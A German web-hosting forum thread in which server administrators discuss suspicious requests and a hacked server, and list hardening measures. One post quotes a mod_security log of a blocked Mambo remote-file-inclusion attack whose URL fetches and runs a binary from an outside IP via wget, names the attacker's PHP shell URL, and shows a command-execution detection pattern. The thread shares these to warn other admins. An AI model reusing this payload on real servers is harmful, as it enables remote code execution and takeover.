Merkwürdige Webseitenaufrufe

Rund um die Sicherheit des Systems und die Applikationen
danu
Posts: 264
Joined: 2005-02-02 11:15
 

Merkwürdige Webseitenaufrufe

Post by danu »

Im mod_security Logfile erscheinen oft Aufrufe wie:

GET / HTTP/1.1
User-Agent: Java1.3.1_07

normalerweise stehen ja bekannte Browser wie Netscape oder Mozilla oder was auch immer an gebräuchlichen Webbrowsern heute zur Verfügung.

Hat jemand eine Ahnung, mit welchen Methoden da irgendwer auf meinen
Wewbserver zugreifen will ? Gooogeln hat nichts gebracht.

Kennt jemand einen User Agent welcher Java1.3.1_07 heisst ???? 8O
Roger Wilco
Posts: 5923
Joined: 2004-05-23 12:53
 

Re: Merkwürdige Webseitenaufrufe

Post by Roger Wilco »

danu wrote:Hat jemand eine Ahnung, mit welchen Methoden da irgendwer auf meinen
Wewbserver zugreifen will ?
Mit der Methode GET.
danu wrote:Kennt jemand einen User Agent welcher Java1.3.1_07 heisst ????
Lass mich überlegen, vielleicht die JVM 1.3.1 Patchlevel 7? Ist ein bisschen betagt, aber offensichtlich doch noch im Einsatz.
simcen
Posts: 333
Joined: 2003-02-12 14:35
Location: Bern, Schweiz
 

Re: Merkwürdige Webseitenaufrufe

Post by simcen »

danu wrote: Kennt jemand einen User Agent welcher Java1.3.1_07 heisst ???? 8O
Du kannst bei jedem selbst gebasteltem Browser oder Skript den User-Agent festlegen... Wenn ich mich nicht irre, geht das sogar beim FeuerFuchsen...
danu
Posts: 264
Joined: 2005-02-02 11:15
 

Aha

Post by danu »

Thks an alle. Damit hat sich mein Verdacht bestätigt. Automatisierte
Queries und POST-Payloads. Die Scriptkiddies werden immer dreister. :?
danu
Posts: 264
Joined: 2005-02-02 11:15
 

Aaaaaatttaaaacke !!!

Post by danu »

Gestern am 15.02. wurde mein Rootie bei S&P innerhalb 5 Minuten
im Sekundentakt ca. von 300 Requests mit unterschiedlichen Parametern heimgesucht. Beispiel aus dem modsec_audit.log:

(xxx.xxx.xxx.xxx --> IP meines Servers)
==84df6500==============================
Request: xxx.xxx.xxx.xxx 85.124.118.43 - - [15/Feb/2006:20:19:09 +0100]
"GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20
/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 403 999 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" - "-"
Handler: type-map
----------------------------------------
GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20 ... 20YYY;echo| HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
mod_security-message: Access denied with code 403. Pattern match ";[[:space:]]*(ls|id|pwd|wget)" at ARGS_VALUES("cmd") [msg "Command execution attack"]
mod_security-action: 403

HTTP/1.1 403 Forbidden
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
--84df6500--
Die Smilies im Log ergeben sich einfach aus der Kombination Strichpunkt & geschlossene Klammer und sind in diesem Kontext nicht beabsichtigt.

Das PHP-Script, welches dazu velinkt werden sollte, ist selbstredend:

http://209.123.16.34/cmd.gif
(ist wirklich ein PHP-Script und kann nur so wie im Log dargestellten Kontext Schaden anrichten)

Mit diesem Posting will ich nur "unseren" Rootie-Administratoren vor Augen führen, womit zu rechnen ist, und keinesfalls irgendwelche Hacker-Anleitungen propagieren :?
Ich hoffe, dass ich richtig verstanden werde.

Gruss, danu
User avatar
Joe User
Project Manager
Project Manager
Posts: 11183
Joined: 2003-02-27 01:00
Location: Hamburg
 

Re: Aaaaaatttaaaacke !!!

Post by Joe User »

danu wrote:http://209.123.16.34/cmd.gif
(ist wirklich ein PHP-Script und kann nur so wie im Log dargestellten
Bekannter und behobener Bug im MSIE...
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.
danu
Posts: 264
Joined: 2005-02-02 11:15
 

Re: Aaaaaatttaaaacke !!!

Post by danu »

Joe User wrote: Bekannter und behobener Bug im MSIE...
Damit ist das Problem ja nicht gelöst. Scriptkiddies verwenden wohl entsprechend modifizierte Browser.
simcen wrote: Du kannst bei jedem selbst gebasteltem Browser oder Skript den User-Agent festlegen... Wenn ich mich nicht irre, geht das sogar beim FeuerFuchsen...
Es wäre ja ein leichtes, mit mod_security die Webseitenzugriffe auf
die "sichere" MSIE Version zu beschränken. Aber das kanns auch nicht sein.

Es ist so, als würde ich einem Einbrecher sagen "Du darfst nur mit einem offiziell registrierten und zugelassenen Schlüssel in meine Wohnung einbrechen, mit einem Dietrich oder selbst gebastelten Schlüssel ist das verboten.

danu
User avatar
Joe User
Project Manager
Project Manager
Posts: 11183
Joined: 2003-02-27 01:00
Location: Hamburg
 

Re: Aaaaaatttaaaacke !!!

Post by Joe User »

danu wrote:
Joe User wrote: Bekannter und behobener Bug im MSIE...
Damit ist das Problem ja nicht gelöst. Scriptkiddies verwenden wohl entsprechend modifizierte Browser.
Sorry, der MSIE-Bug ist hier nur sekundär relevant, primär sollte ein Bug in dem Script ausgenutzt werden, was aber durch mod_security erfolgreich verhindert wurde. Du solltest entweder das Script fixen, oder durch ein sichereres Script ersetzen...
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.
danu
Posts: 264
Joined: 2005-02-02 11:15
 

Von Anfang an

Post by danu »

Ja dank mod_security. Da musste ich erst darauf kommen. Am 23. Januar wurde mein Server gehackt :oops: Totalschaden, geshreddert. Sämtliche index.* irgendwas -Dateien waren defaced.
Bei mehr als 100 Domains von 56 Kunden mochte ich nicht lange suchen, welches Script da Schuld war. Ich musste den Server so schnell als möglich wieder Up haben. Also neu initieren, Backup drauf und nach ca 3 Stunden funktionierte ALLES wieder.

Seither habe ich alles mögliche für die Sicherheit unternommen:

1. Firewall aktiviert
Der Anbieter stellt einen externen Firewall zu Verfügung

2. Direktes root-Login ausgeschaltet.

3. SSHd Konsole Login nur noch für mich,
und das nur noch (chrooted) bin/bash.

4. Rootkit Hunter installiert.
Stellt in jedem Fall fest, wenn ein neuer User generiert wird,
oder in den Systemdateien etwas verändert wird.
(gut möglich, dass ich ein Rootkit darauf hatte, und
die ganze Zeit nichts bemerkt hatte)

5. IP_Blocker installiert
Die mehrmals täglich stattfindenden Brute Force Attacken mit jeweils
hunderten sshd-Loginversuchen werden damit unterbunden. Nach jeweils
3 Loginversuchen, wird die jeweilige IP für eine Zeit lang gesperrt. Ein paar Angreifer haben bereits aufgegeben.

6. Das Apachemodul mod_security installiert
Bin noch dabei die "Rules" zu optimieren.

Habe noch wegen der Scripte die neuen AGB's an die Kunden verschickt und habe bei diesen und jenen noch die Mambo CMS und phpBB (gebührenpflichtig) auf die neuesten Versionen updatet.

Mit andern Worten: Die letzten 20 Tage hatte ich einiges neu hinzu gelernt - auch dank diesem Forum.

An dieser Stelle nochmals ein Loblied auf mod_security:
Trotz alter Gästebuch-CGI's werden die Gästebücher nicht mehr mit Casinowerbung etc. vollgespamt. :D
Bei mehr als 100 Domains will (darf) ich ja nicht sämtliche Verzeichnisse nach gefährlichen Scripts absuchen. Deshalb benütze ich mod_security ja auch als zusätzlichen Schutz, weil ja "unsaubere" Requests und POST's gar nicht mehr beim Script ankommen sollen.

Gruss, danu